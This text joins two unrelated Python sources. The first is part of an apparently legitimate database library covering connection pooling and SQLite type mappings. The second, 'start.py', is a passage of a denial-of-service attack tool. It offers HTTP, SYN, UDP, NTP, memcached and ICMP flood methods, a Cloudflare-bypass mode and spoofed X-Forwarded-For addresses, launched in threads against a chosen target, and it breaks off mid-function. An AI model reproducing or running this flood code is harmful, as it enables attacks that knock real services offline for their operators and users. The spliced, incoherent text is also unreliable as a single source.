self.cpool_idle.append(cpool_item)
elif (cpool_item.last_seen <= old_time and
self.dbapi.threadsafety <= 1):
logging.debug(
"pool_cleaner removing database connection "
"after Thread[%i] timed out",
cpool_item.thread_id)
del self.cpool_unlocked[cpool_item.thread_id]
self.cpool_size -= 1
to_close.append(cpool_item.dbc)
i = len(self.cpool_idle)
while i:
i = i - 1
cpool_item = self.cpool_idle[i]
if cpool_item.last_seen <= old_time:
logging.info("pool_cleaner removed idle connection")
to_close.append(cpool_item.dbc)
del self.cpool_idle[i]
self.cpool_size -= 1
for dbc in to_close:
if dbc is not None:
self.close_connection(dbc)
def open(self):
"""Creates and returns a new connection object.
Must be overridden by database specific implementations because
        the underlying DB API does not provide a standard method of
connecting."""
raise NotImplementedError
def close_connection(self, connection):
"""Calls the underlying close method."""
connection.close()
def break_connection(self, connection):
"""Called when closing or cleaning up locked connections.
This method is called when the connection is locked (by a
different thread) and the caller wants to force that thread to
relinquish control.
The assumption is that the database is stuck in some lengthy
transaction and that break_connection can be used to terminate
the transaction and force an exception in the thread that
initiated it - resulting in a subsequent call to
:py:meth:`release_connection` and a state which enables this
thread to acquire the connection's lock so that it can close it.
The default implementation does nothing, which might cause the
close method to stall until the other thread relinquishes
control normally."""
pass
def close(self, timeout=5):
"""Closes this database.
This method goes through each open connection and attempts to
acquire it and then close it. The object is put into a mode
that disables :py:meth:`acquire_connection` (it returns None
from now on).
timeout
Defaults to 5 seconds. If connections are locked by other
*running* threads we wait for those threads to release them,
calling :py:meth:`break_connection` to speed up termination
if possible.
If None (not recommended!) this method will block
indefinitely until all threads properly call
:py:meth:`release_connection`.
Any locks we fail to acquire in the timeout are ignored and
the connections are left open for the python garbage
collector to dispose of."""
thread_id = threading.current_thread().ident
to_close = []
self.closing.set()
with self.cpool_lock:
nlocked = None
while True:
while self.cpool_idle:
cpool_item = self.cpool_idle.pop()
                    logging.debug(
                        "closing idle database connection on container "
                        "close")
to_close.append(cpool_item.dbc)
while self.cpool_unlocked:
unlocked_id, cpool_item = self.cpool_unlocked.popitem()
to_close.append(cpool_item.dbc)
locked_list = list(dict_values(self.cpool_locked))
for cpool_item in locked_list:
if cpool_item.thread_id == thread_id:
logging.error(
"Thread[%i] failed to release database connection "
"before closing container", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
elif not cpool_item.thread.isAlive():
logging.error(
"Thread[%i] failed to release database connection "
"before terminating", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
else:
# thread is alive, try and interrupt it if it is
# stuck in a slow query
self.break_connection(cpool_item.dbc)
if self.cpool_locked and (nlocked is None or
nlocked > len(self.cpool_locked)):
# if this is the first time around the loop, or...
# if the size of the locked pool is actually
# shrinking, wait for locked connections to be
# released
nlocked = len(self.cpool_locked)
logging.warn(
"Waiting to break unreleased database connections")
self.cpool_lock.wait(timeout)
continue
# we're not getting anywhere, force-close these
# connections
locked_list = list(dict_values(self.cpool_locked))
for cpool_item in locked_list:
logging.error(
"Thread[%i] failed to release database connection: "
"forcing it to close", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
break
for dbc in to_close:
if dbc is not None:
self.close_connection(dbc)
def quote_identifier(self, identifier):
"""Given an *identifier* returns a safely quoted form of it.
        By default we strip double quotes and then use them to enclose
it. E.g., if the string 'Employee_Name' is passed then the
string '"Employee_Name"' is returned."""
return '"%s"' % identifier.replace('"', '')
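    # Sketch of a platform-specific override (assumption: a backend such
    # as MySQL that quotes identifiers with backticks and escapes them by
    # doubling)::
    #
    #   def quote_identifier(self, identifier):
    #       return '`%s`' % identifier.replace('`', '``')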
def prepare_sql_type(self, simple_value, params, nullable=None):
"""Given a simple value, returns a SQL-formatted name of its type.
Used to construct CREATE TABLE queries.
simple_value
A :py:class:`pyslet.odata2.csdl.SimpleValue` instance which
should have been created from a suitable
:py:class:`pyslet.odata2.csdl.Property` definition.
params
A :py:class:`SQLParams` object. If simple_value is non-NULL, a
DEFAULT value is added as part of the type definition.
nullable
Optional Boolean that can be used to override the nullable status
of the associated property definition.
For example, if the value was created from an Int32 non-nullable
property and has value 0 then this might return the string
'INTEGER NOT NULL DEFAULT ?' with 0 being added to *params*
You should override this implementation if your database
platform requires special handling of certain datatypes. The
default mappings are given below.
================== =============================================
EDM Type SQL Equivalent
------------------ ---------------------------------------------
Edm.Binary BINARY(MaxLength) if FixedLength specified
Edm.Binary VARBINARY(MaxLength) if no FixedLength
Edm.Boolean BOOLEAN
Edm.Byte SMALLINT
Edm.DateTime TIMESTAMP
Edm.DateTimeOffset CHARACTER(27), ISO 8601 string
                            representation is used with microsecond
precision
Edm.Decimal DECIMAL(Precision,Scale), defaults 10,0
Edm.Double FLOAT
Edm.Guid BINARY(16)
Edm.Int16 SMALLINT
Edm.Int32 INTEGER
Edm.Int64 BIGINT
Edm.SByte SMALLINT
Edm.Single REAL
Edm.String CHAR(MaxLength) or VARCHAR(MaxLength)
Edm.String NCHAR(MaxLength) or NVARCHAR(MaxLength) if
Unicode="true"
Edm.Time TIME
================== =============================================
Parameterized CREATE TABLE queries are unreliable in my
        experience, so the current implementation of the native
        create_table methods ignores default values when calling this
method."""
p = simple_value.p_def
column_def = []
if isinstance(simple_value, edm.BinaryValue):
if p is None:
                raise NotImplementedError(
                    "SQL binding for Edm.Binary of unbounded length")
elif p.fixedLength:
if p.maxLength:
column_def.append("BINARY(%i)" % p.maxLength)
else:
raise edm.ModelConstraintError(
"Edm.Binary of fixed length missing max: %s" % p.name)
elif p.maxLength:
column_def.append("VARBINARY(%i)" % p.maxLength)
else:
raise NotImplementedError(
"SQL binding for Edm.Binary of unbounded length: %s" %
p.name)
elif isinstance(simple_value, edm.BooleanValue):
column_def.append("BOOLEAN")
elif isinstance(simple_value, edm.ByteValue):
column_def.append("SMALLINT")
elif isinstance(simple_value, edm.DateTimeValue):
column_def.append("TIMESTAMP")
elif isinstance(simple_value, edm.DateTimeOffsetValue):
# stored as string and parsed e.g. 20131209T100159.000000+0100
# need to check the precision and that in to the mix
column_def.append("CHARACTER(27)")
elif isinstance(simple_value, edm.DecimalValue):
if p.precision is None:
precision = 10 # chosen to allow 32-bit integer precision
else:
precision = p.precision
if p.scale is None:
scale = 0 # from the CSDL model specification
else:
scale = p.scale
column_def.append("DECIMAL(%i,%i)" % (precision, scale))
elif isinstance(simple_value, edm.DoubleValue):
column_def.append("FLOAT")
elif isinstance(simple_value, edm.GuidValue):
column_def.append("BINARY(16)")
elif isinstance(simple_value, edm.Int16Value):
column_def.append("SMALLINT")
elif isinstance(simple_value, edm.Int32Value):
column_def.append("INTEGER")
elif isinstance(simple_value, edm.Int64Value):
column_def.append("BIGINT")
elif isinstance(simple_value, edm.SByteValue):
column_def.append("SMALLINT")
elif isinstance(simple_value, edm.SingleValue):
column_def.append("REAL")
elif isinstance(simple_value, edm.StringValue):
if p.unicode is None or p.unicode:
n = "N"
else:
n = ""
if p.fixedLength:
if p.maxLength:
column_def.append("%sCHAR(%i)" % (n, p.maxLength))
else:
raise edm.ModelConstraintError(
"Edm.String of fixed length missing max: %s" % p.name)
elif p.maxLength:
column_def.append("%sVARCHAR(%i)" % (n, p.maxLength))
else:
raise NotImplementedError(
"SQL binding for Edm.String of unbounded length: %s" %
p.name)
elif isinstance(simple_value, edm.TimeValue):
column_def.append("TIME")
else:
raise NotImplementedError("SQL type for %s" % p.type)
if ((nullable is not None and not nullable) or
(nullable is None and p is not None and not p.nullable)):
column_def.append(' NOT NULL')
if simple_value:
# Format the default
column_def.append(' DEFAULT ')
column_def.append(
params.add_param(self.prepare_sql_value(simple_value)))
return ''.join(column_def)
def prepare_sql_value(self, simple_value):
"""Returns a python object suitable for passing as a parameter
simple_value
A :py:class:`pyslet.odata2.csdl.SimpleValue` instance.
You should override this method if your database requires
special handling of parameter values. The default
implementation performs the following conversions
================== =======================================
EDM Type Python value added as parameter
------------------ ---------------------------------------
NULL None
Edm.Binary (byte) string
Edm.Boolean True or False
Edm.Byte int
Edm.DateTime Timestamp instance from DB API module
Edm.DateTimeOffset string (ISO 8601 basic format)
Edm.Decimal Decimal instance
Edm.Double float
Edm.Guid (byte) string
Edm.Int16 int
Edm.Int32 int
Edm.Int64 long
Edm.SByte int
Edm.Single float
Edm.String (unicode) string
Edm.Time Time instance from DB API module
================== =======================================
"""
if not simple_value:
return None
elif isinstance(simple_value, (
edm.BooleanValue,
edm.BinaryValue,
edm.ByteValue,
edm.DecimalValue,
edm.DoubleValue,
edm.Int16Value,
edm.Int32Value,
edm.Int64Value,
edm.SByteValue,
edm.SingleValue,
edm.StringValue
)):
return simple_value.value
elif isinstance(simple_value, edm.DateTimeValue):
microseconds, seconds = math.modf(simple_value.value.time.second)
return self.dbapi.Timestamp(
simple_value.value.date.century *
100 + simple_value.value.date.year,
simple_value.value.date.month,
simple_value.value.date.day,
simple_value.value.time.hour,
simple_value.value.time.minute,
int(seconds), int(1000000.0 * microseconds + 0.5))
elif isinstance(simple_value, edm.DateTimeOffsetValue):
return simple_value.value.get_calendar_string(
basic=True, ndp=6, dp=".").ljust(27, ' ')
elif isinstance(simple_value, edm.GuidValue):
return simple_value.value.bytes
elif isinstance(simple_value, edm.TimeValue):
return self.dbapi.Time(
simple_value.value.hour,
simple_value.value.minute,
simple_value.value.second)
else:
raise NotImplementedError(
"SQL type for " + simple_value.__class__.__name__)
def read_sql_value(self, simple_value, new_value):
"""Updates *simple_value* from *new_value*.
simple_value
A :py:class:`pyslet.odata2.csdl.SimpleValue` instance.
new_value
A value returned by the underlying DB API, e.g., from a cursor
fetch operation
This method performs the reverse transformation to
:py:meth:`prepare_sql_value` and may need to be overridden to
convert *new_value* into a form suitable for passing to the
underlying
:py:meth:`~pyslet.odata2.csdl.SimpleValue.set_from_value`
method."""
if new_value is None:
simple_value.set_null()
elif isinstance(simple_value, (edm.DateTimeOffsetValue)):
# we stored these as strings
simple_value.set_from_value(
iso.TimePoint.from_str(new_value, tdesignators="T "))
else:
simple_value.set_from_value(new_value)
def new_from_sql_value(self, sql_value):
"""Returns a new simple value with value *sql_value*
The return value is a :py:class:`pyslet.odata2.csdl.SimpleValue`
instance.
sql_value
A value returned by the underlying DB API, e.g., from a
cursor fetch operation
This method creates a new instance, selecting the most
appropriate type to represent sql_value. By default
:py:meth:`pyslet.odata2.csdl.EDMValue.from_value`
is used.
You may need to override this method to identify the appropriate
value type."""
return edm.EDMValue.from_value(sql_value)
def select_limit_clause(self, skip, top):
"""Returns a SELECT modifier to limit a query
See :meth:`limit_clause` for details of the parameters.
Returns a tuple of:
skip
0 if the modifier implements this functionality. If it does
not implement this function then the value passed in for
skip *must* be returned.
modifier
A string modifier to insert immediately after the SELECT
statement (must be empty or end with a space).
For example, if your database supports the TOP keyword you might
return::
(skip, 'TOP %i' % top)
This will result in queries such as::
            SELECT TOP 10 * FROM ....
More modern syntax tends to use a special limit clause at the
end of the query, rather than a SELECT modifier. The default
implementation returns::
(skip, '')
...essentially doing nothing."""
return (skip, '')
def limit_clause(self, skip, top):
"""Returns a limit clause to limit a query
skip
An integer number of entities to skip
top
An integer number of entities to limit the result set of a
            query or None if no limit is desired.
Returns a tuple of:
skip
0 if the limit clause implements this functionality. If it
does not implement this function then the value passed in
for skip *must* be returned.
clause
A limit clause to append to the query. Must be empty or end
with a space.
For example, if your database supports the MySQL-style LIMIT and
OFFSET keywords you would return (for non-None values of top)::
(0, 'LIMIT %i OFFSET %i' % (top, skip))
This will result in queries such as::
SELECT * FROM Customers LIMIT 10 OFFSET 20
        More modern syntax tends to use a special limit clause at the
        end of the query, rather than a SELECT modifier, such as::
            (skip, 'FETCH FIRST %i ROWS ONLY ' % top)
        This syntax is part of the SQL:2008 standard but is not widely
        adopted and, for compatibility with existing external database
        implementations, the default implementation remains blank."""
return (skip, '')
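# A minimal sketch, not part of the shipped implementations, showing how a
# derived container might implement the limit_clause extension point using
# the LIMIT/OFFSET style described in the docstring above. The class name
# is invented and a real subclass would also need to supply a dbapi module
# and an open() method for its target database.
class ExampleLimitContainer(SQLEntityContainer):

    def limit_clause(self, skip, top):
        if top is not None:
            # the database implements the paging so report skip as
            # handled by returning 0
            return 0, 'LIMIT %i OFFSET %i ' % (top, skip)
        return skip, ''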
class SQLiteEntityContainer(SQLEntityContainer):
"""Creates a container that represents a SQLite database.
Additional keyword arguments:
file_path
The path to the SQLite database file.
sqlite_options
A dictionary of additional options to pass as named arguments to
the connect method. It defaults to an empty dictionary, you
won't normally need to pass additional options and you shouldn't
change the isolation_level as the collection classes have been
designed to work in the default mode. Also, check_same_thread
is forced to False, this is poorly documented but we only do it
so that we can close a connection in a different thread from the
one that opened it when cleaning up.
For more information see sqlite3_
.. _sqlite3: https://docs.python.org/2/library/sqlite3.html
All other keyword arguments required to initialise the base class
must be passed on construction except *dbapi* which is automatically
set to the Python sqlite3 module."""
def __init__(self, file_path, sqlite_options={}, **kwargs):
if is_text(file_path) and file_path == ":memory:":
if (('max_connections' in kwargs and
kwargs['max_connections'] != 1) or
'max_connections' not in kwargs):
logging.warn("Forcing max_connections=1 for in-memory "
"SQLite database")
kwargs['max_connections'] = 1
self.sqlite_memdbc = sqlite3.connect(
":memory:", check_same_thread=False, **sqlite_options)
else:
self.sqlite_memdbc = None
super(SQLiteEntityContainer, self).__init__(dbapi=sqlite3, **kwargs)
if (not isinstance(file_path, OSFilePath) and not is_text(file_path)):
raise TypeError("SQLiteDB requires an OS file path")
self.file_path = file_path
self.sqlite_options = sqlite_options
def get_collection_class(self):
"""Overridden to return :py:class:`SQLiteEntityCollection`"""
return SQLiteEntityCollection
def get_symmetric_navigation_class(self):
"""Overridden to return :py:class:`SQLiteAssociationCollection`"""
return SQLiteAssociationCollection
def get_fk_class(self):
"""Overridden to return :py:class:`SQLiteForeignKeyCollection`"""
return SQLiteForeignKeyCollection
def get_rk_class(self):
"""Overridden to return :py:class:`SQLiteReverseKeyCollection`"""
return SQLiteReverseKeyCollection
def open(self):
"""Calls the underlying connect method.
Passes the file_path used to construct the container as the only
parameter. You can pass the string ':memory:' to create an
in-memory database.
        Other connection arguments are not currently supported; you can
        derive a more complex implementation by overriding this method
        and (optionally) the __init__ method to pass in additional
        connection values."""
if self.sqlite_memdbc is not None:
return self.sqlite_memdbc
dbc = self.dbapi.connect(str(self.file_path), check_same_thread=False,
**self.sqlite_options)
c = dbc.cursor()
c.execute("PRAGMA foreign_keys = ON")
c.close()
return dbc
def break_connection(self, connection):
"""Calls the underlying interrupt method."""
connection.interrupt()
def close_connection(self, connection):
"""Calls the underlying close method."""
if self.sqlite_memdbc is None:
connection.close()
def close(self):
super(SQLiteEntityContainer, self).close()
# close any in-memory database
if self.sqlite_memdbc is not None:
self.sqlite_memdbc.close()
def prepare_sql_type(self, simple_value, params, nullable=None):
"""Performs SQLite custom mappings
================== ===================================
EDM Type SQLite Equivalent
------------------ -----------------------------------
Edm.Binary BLOB
Edm.Decimal TEXT
Edm.Guid BLOB
Edm.String TEXT
Edm.Time REAL
Edm.Int64 INTEGER
================== ===================================
The remainder of the type mappings use the defaults from the
parent class."""
p = simple_value.p_def
column_def = []
if isinstance(simple_value, (edm.StringValue, edm.DecimalValue)):
column_def.append("TEXT")
elif isinstance(simple_value, (edm.BinaryValue, edm.GuidValue)):
column_def.append("BLOB")
elif isinstance(simple_value, edm.TimeValue):
column_def.append("REAL")
elif isinstance(simple_value, edm.Int64Value):
column_def.append("INTEGER")
else:
return super(
SQLiteEntityContainer,
self).prepare_sql_type(
simple_value,
params,
nullable)
if ((nullable is not None and not nullable) or
(nullable is None and p is not None and not p.nullable)):
column_def.append(' NOT NULL')
if simple_value:
# Format the default
column_def.append(' DEFAULT ')
column_def.append(
params.add_param(self.prepare_sql_value(simple_value)))
return ''.join(column_def)
def prepare_sql_value(self, simple_value):
"""Returns a python value suitable for passing as a parameter.
We inherit most of the value mappings but the following types
have custom mappings.
================== ==============================================
EDM Type Python value added as parameter
------------------ ----------------------------------------------
Edm.Binary buffer object
Edm.Decimal string representation obtained with str()
Edm.Guid buffer object containing bytes representation
Edm.Time value of
:py:meth:`pyslet.iso8601.Time.get_total_seconds`
================== ==============================================
        Our use of the buffer type is not ideal as it generates a warning when
Python is run with the -3 flag (to check for Python 3
compatibility) but it seems unavoidable at the current time."""
if not simple_value:
return None
elif isinstance(simple_value, edm.BinaryValue):
return buffer2(simple_value.value)
elif isinstance(simple_value, edm.DecimalValue):
return str(simple_value.value)
elif isinstance(simple_value, edm.GuidValue):
return buffer2(simple_value.value.bytes)
elif isinstance(simple_value, edm.TimeValue):
return simple_value.value.get_total_seconds()
else:
return super(
SQLiteEntityContainer,
self).prepare_sql_value(simple_value)
def read_sql_value(self, simple_value, new_value):
"""Reverses the transformation performed by prepare_sql_value"""
if new_value is None:
simple_value.set_null()
elif isinstance(new_value, buffer2):
new_value = bytes(new_value)
simple_value.set_from_value(new_value)
elif isinstance(simple_value,
(edm.DateTimeValue, edm.DateTimeOffsetValue)):
# SQLite stores these as strings
simple_value.set_from_value(
iso.TimePoint.from_str(new_value, tdesignators="T "))
elif isinstance(simple_value, edm.TimeValue):
simple_value.value = iso.Time(total_seconds=new_value)
elif isinstance(simple_value, edm.DecimalValue):
simple_value.value = decimal.Decimal(new_value)
else:
simple_value.set_from_value(new_value)
def new_from_sql_value(self, sql_value):
"""Returns a new simple value instance initialised from *sql_value*
Overridden to ensure that buffer objects returned by the
underlying DB API are converted to strings. Otherwise
*sql_value* is passed directly to the parent."""
if isinstance(sql_value, buffer2):
result = edm.BinaryValue()
result.set_from_value(bytes(sql_value))
return result
else:
return super(SQLiteEntityContainer, self).new_from_sql_value(
sql_value)
def limit_clause(self, skip, top):
clause = []
if top:
clause.append('LIMIT %i ' % top)
if skip:
clause.append('OFFSET %i ' % skip)
skip = 0
return skip, ''.join(clause)
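# Illustrative note (not part of the original source): limit_clause maps OData
# paging onto SQLite's native LIMIT/OFFSET support and returns skip=0 so the
# caller does not have to discard rows itself, e.g.
#   skip, clause = container.limit_clause(10, 5)   # container: a SQLiteEntityContainer
#   # skip == 0, clause == 'LIMIT 5 OFFSET 10 '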
class SQLiteEntityCollectionBase(SQLCollectionBase):
"""Base class for SQLite SQL custom mappings.
This class provides some SQLite specific mappings for certain
functions to improve compatibility with the OData expression
language."""
def sql_expression_length(self, expression, params, context):
"""Converts the length method: maps to length( op[0] )"""
query = ["length("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(")")
return ''.join(query) # don't bother with brackets!
def sql_expression_year(self, expression, params, context):
"""Converts the year method
maps to CAST(strftime('%Y',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%Y',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_month(self, expression, params, context):
"""Converts the month method
maps to CAST(strftime('%m',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%m',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_day(self, expression, params, context):
"""Converts the day method
maps to CAST(strftime('%d',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%d',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_hour(self, expression, params, context):
"""Converts the hour method
maps to CAST(strftime('%H',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%H',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_minute(self, expression, params, context):
"""Converts the minute method
maps to CAST(strftime('%M',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%M',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_second(self, expression, params, context):
"""Converts the second method
maps to CAST(strftime('%S',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%S',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_tolower(self, expression, params, context):
"""Converts the tolower method
maps to lower(op[0])"""
query = ["lower("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(")")
return ''.join(query) # don't bother with brackets!
def sql_expression_toupper(self, expression, params, context):
"""Converts the toupper method
maps to upper(op[0])"""
query = ["upper("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(")")
return ''.join(query) # don't bother with brackets!
class SQLiteEntityCollection(SQLiteEntityCollectionBase, SQLEntityCollection):
"""SQLite-specific collection for entity sets"""
def where_last(self, entity, params):
"""In SQLite all tables have a ROWID concept"""
return ' WHERE ROWID = last_insert_rowid()'
class SQLiteAssociationCollection(
SQLiteEntityCollectionBase,
SQLAssociationCollection):
"""SQLite-specific collection for symmetric association sets"""
pass
class SQLiteForeignKeyCollection(
SQLiteEntityCollectionBase,
SQLForeignKeyCollection):
"""SQLite-specific collection for navigation from a foreign key"""
pass
class SQLiteReverseKeyCollection(
SQLiteEntityCollectionBase,
SQLReverseKeyCollection):
"""SQLite-specific collection for navigation to a foreign key"""
pass
class SQLiteStreamStore(blockstore.StreamStore):
"""A stream store backed by a SQLite database.
file_path
The path to the SQLite database file.
dpath
The optional directory path to the file system to use for
storing the blocks of data. If dpath is None then the blocks are
stored in the SQLite database itself."""
def load_container(self):
"""Loads and returns a default entity container
The return value is a
:py:class:`pyslet.odata2.csdl.EntityContainer` instance with
an EntitySets called 'Blocks', 'Locks' and 'Streams' that are
suitable for passing to the constructors of
:py:class:`pyslet.blockstore.BlockStore`,
:py:class:`pyslet.blockstore.LockStore` and
:py:class:`pyslet.blockstore.StreamStore`
respectively."""
doc = edmx.Document()
with io.open(os.path.join(os.path.dirname(__file__),
'streamstore.xml'), 'rb') as f:
doc.read(f)
return doc.root.DataServices['StreamStoreSchema.Container']
def __init__(self, file_path, dpath=None):
self.container_def = self.load_container()
if isinstance(file_path, OSFilePath):
file_path = str(file_path)
create = not os.path.exists(file_path)
self.container = SQLiteEntityContainer(file_path=file_path,
container=self.container_def)
if create:
self.container.create_all_tables()
if dpath is None:
    # per the class docstring, blocks live inside the SQLite database itself
    bs = blockstore.EDMBlockStore(
        entity_set=self.container_def['Blocks'])
else:
    bs = blockstore.FileBlockStore(dpath)
ls = blockstore.LockStore(entity_set=self.container_def['Locks'])
blockstore.StreamStore.__init__(
self, bs, ls, self.container_def['Streams'])
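# Usage sketch (illustrative; the file and directory names are assumptions):
#   store = SQLiteStreamStore('streams.db')
#   # block data is kept inside streams.db itself (EDMBlockStore)
#   store = SQLiteStreamStore('streams.db', dpath='blocks')
#   # stream/lock metadata in streams.db, block data under the 'blocks' directory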
|
start.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
l7 = ["CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "OSTRESS", "DYN", "SLOW", "HEAD", "HIT", "NULL", "COOKIE", "BRUST", "PPS", "EVEN", "GSB", "DGB", "AVB"]
l4 = ["TCP", "UDP", "SYN", "VSE", "MEM", "NTP"]
l3 = ["POD", "ICMP"]
to = ["CFIP", "DNS", "PING", "CHECK", "DSTAT", "INFO"]
ot = ["STOP", "TOOLS", "HELP"]
methods = l7 + l4 + l3
methodsl = l7 + l4 + l3 + to + ot
try:
import os
except:
print("system error!")
exit()
def clear_screen():
if (os.name == "nt"):
os.system('cls')
else:
os.system('clear')
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def start_attack(method, threads, event, socks_type):
global out_file
# layer7
cmethod = str(method.upper())
if (cmethod != "HIT") and (cmethod not in l4) and (cmethod not in l3) and (cmethod != "OSTRESS"):
out_file = str("files/proxys/" + sys.argv[5])
proxydl(out_file, socks_type)
print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums)))
else:
print("{} Attack Started To {}:{} For {} Seconds".format(method, target, port, sys.argv[7]))
try:
if method == "post":
for _ in range(threads):
threading.Thread(target=post, args=(event, socks_type), daemon=True).start()
elif method == "brust":
for _ in range(threads):
threading.Thread(target=brust, args=(event, socks_type), daemon=True).start()
elif method == "get":
for _ in range(threads):
threading.Thread(target=http, args=(event, socks_type), daemon=True).start()
elif method == "pps":
for _ in range(threads):
threading.Thread(target=pps, args=(event, socks_type), daemon=True).start()
elif method == "even":
for _ in range(threads):
threading.Thread(target=even, args=(event, socks_type), daemon=True).start()
elif method == "ovh":
for _ in range(threads):
threading.Thread(target=ovh, args=(event, socks_type), daemon=True).start()
elif method == "capb":
for _ in range(threads):
threading.Thread(target=capb, args=(event, socks_type), daemon=True).start()
elif method == "cookie":
for _ in range(threads):
threading.Thread(target=cookie, args=(event, socks_type), daemon=True).start()
elif method == "tor":
for _ in range(threads):
threading.Thread(target=tor, args=(event, socks_type), daemon=True).start()
elif method == "bypass":
for _ in range(threads):
threading.Thread(target=bypass, args=(event, socks_type), daemon=True).start()
elif method == "head":
for _ in range(threads):
threading.Thread(target=head, args=(event, socks_type), daemon=True).start()
elif method == "stress":
for _ in range(threads):
threading.Thread(target=stress, args=(event, socks_type), daemon=True).start()
elif method == "ostress":
for _ in range(threads):
threading.Thread(target=ostress, args=(event, socks_type), daemon=True).start()
elif method == "null":
for _ in range(threads):
threading.Thread(target=null, args=(event, socks_type), daemon=True).start()
elif method == "cfb":
for _ in range(threads):
threading.Thread(target=cfb, args=(event, socks_type), daemon=True).start()
elif method == "avb":
for _ in range(threads):
threading.Thread(target=AVB, args=(event, socks_type), daemon=True).start()
elif method == "gsb":
for _ in range(threads):
threading.Thread(target=gsb, args=(event, socks_type), daemon=True).start()
elif method == "dgb":
for _ in range(threads):
threading.Thread(target=dgb, args=(event, socks_type), daemon=True).start()
elif method == "dyn":
for _ in range(threads):
threading.Thread(target=dyn, args=(event, socks_type), daemon=True).start()
elif method == "hit":
for _ in range(threads):
threading.Thread(target=hit, args=(event, timer), daemon=True).start()
# layer4
elif method == "vse":
for _ in range(threads):
threading.Thread(target=vse, args=(event, timer), daemon=True).start()
elif method == "udp":
for _ in range(threads):
threading.Thread(target=udp, args=(event, timer), daemon=True).start()
elif method == "tcp":
for _ in range(threads):
threading.Thread(target=tcp, args=(event, timer), daemon=True).start()
elif method == "syn":
for _ in range(threads):
threading.Thread(target=syn, args=(event, timer), daemon=True).start()
elif method == "mem":
for _ in range(threads):
threading.Thread(target=mem, args=(event, timer), daemon=True).start()
elif method == "ntp":
for _ in range(threads):
threading.Thread(target=ntp, args=(event, timer), daemon=True).start()
# layer3
elif method == "icmp":
for _ in range(threads):
threading.Thread(target=icmp, args=(event, timer), daemon=True).start()
elif method == "pod":
for _ in range(threads):
threading.Thread(target=pod, args=(event, timer), daemon=True).start()
except:
pass
def random_data():
return str(Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice(
strings) + Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice(
strings))
def Headers(method):
header = ""
if method == "get" or method == "head":
connection = "Connection: Keep-Alive\r\n"
accept = Choice(acceptall) + "\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = referer + useragent + accept + connection + "\r\n\r\n"
elif method == "cookie":
connection = "Connection: Keep-Alive\r\n"
more = "cache-control: no-cache\r\n"
parm = "pragma: no-cache\r\n"
up = "upgrade-insecure-requests: 1"
connection += "Cookies: " + str(secrets.token_urlsafe(16)) + "\r\n"
accept = Choice(acceptall) + "\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = referer + useragent + accept + connection + more + up + parm + "\r\n\r\n"
elif method == "brust":
connection = "Connection: Keep-Alive\r\n"
more = "Cache-Control: max-age=0\r\n"
more2 = "Via: 1.0 PROXY\r\n"
proxyd = str(proxy)
xfor = "X-Forwarded-For: " + proxyd + "\r\n"
accept = "Accept: */*\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = referer + useragent + accept + connection + more + xfor + more2 + "\r\n\r\n"
elif method == "even":
up = "Upgrade-Insecure-Requests: 1\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
proxyd = str(proxy)
xfor = "X-Forwarded-For: " + proxyd + "\r\n"
header = referer + useragent + up + xfor + "\r\n\r\n"
elif method == "ovh":
accept = Choice(acceptall) + "\r\n"
more = "Connection: keep-alive\r\n"
connection = "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
up = "Upgrade-Insecure-Requests: 1\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = useragent + more + accept + up + "\r\n\r\n"
elif method == "pps":
header = "GET / HTTP/1.1\r\n\r\n"
elif method == "dyn":
connection = "Connection: Keep-Alive\r\n"
accept = Choice(acceptall) + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
